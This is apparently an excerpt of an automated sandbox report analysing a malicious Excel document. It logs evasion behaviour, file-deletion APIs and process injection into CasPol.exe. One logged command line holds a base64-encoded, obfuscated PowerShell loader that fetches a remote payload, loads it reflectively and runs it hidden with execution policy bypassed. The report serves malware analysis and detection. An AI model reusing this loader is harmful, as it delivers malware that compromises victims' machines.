                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: pi-77159.xlsStream path 'MBD0032224F/Package' entropy: 7.99627310248 (max. 8.0)
                    Source: pi-77159.xlsStream path 'Workbook' entropy: 7.99880669565 (max. 8.0)
                    Source: ~DFC4030D08E8153FBD.TMP.0.drStream path 'Package' entropy: 7.99440142372 (max. 8.0)
                    Source: 38630000.0.drStream path 'MBD0032224F/Package' entropy: 7.99440142372 (max. 8.0)
                    Source: 38630000.0.drStream path 'Workbook' entropy: 7.99804738159 (max. 8.0)

                    Malware Analysis System Evasion

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0040E54F Sleep,ExitProcess,34_2_0040E54F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE89B03122 rdtsc 6_2_000007FE89B03122
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,34_2_004198C2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2143
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4234
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6014
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1395
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1419
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 403
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1533
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6507
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 723
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1774
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 880
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1868
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 857
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2156
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4730
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 6.3 %
                    Source: C:\Windows\System32\mshta.exe TID: 3864Thread sleep time: -420000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3096Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3316Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep count: 6014 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep count: 1395 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3260Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3256Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3144Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2148Thread sleep count: 1419 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264Thread sleep count: 403 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1372Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2176Thread sleep count: 1533 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2176Thread sleep count: 6507 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1944Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1356Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1356Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1356Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\mshta.exe TID: 3608Thread sleep time: -300000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3956Thread sleep count: 723 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3924Thread sleep count: 1774 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3868Thread sleep time: -240000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3292Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3884Thread sleep count: 880 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3872Thread sleep count: 1868 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3880Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1964Thread sleep count: 2156 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 896Thread sleep count: 4730 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1884Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1392Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1392Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1392Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 804Thread sleep count: 57 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4028Thread sleep time: -180000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,34_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,34_2_0041B42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,34_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0044D5E9 FindFirstFileExA,34_2_0044D5E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,34_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00406AC2 FindFirstFileW,FindNextFileW,34_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,34_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,34_2_00418C69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,34_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,34_2_00406F06
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_0043A65D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,34_2_0041BCE3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00442554 mov eax, dword ptr fs:[00000030h]34_2_00442554
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0044E92E GetProcessHeap,34_2_0044E92E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00433CD7 SetUnhandledExceptionFilter,34_2_00433CD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_00434168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00433B44

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1712, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG
9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 7EFDE008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 34_2_00410F36
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00418754 mouse_event,34_2_00418754
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB76D.tmp" "c:\Users\user\AppData\Local\Temp\qvgum1lr\CSC3E3F8E93A6CD4B728B9027B482B0AFC2.TMP"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
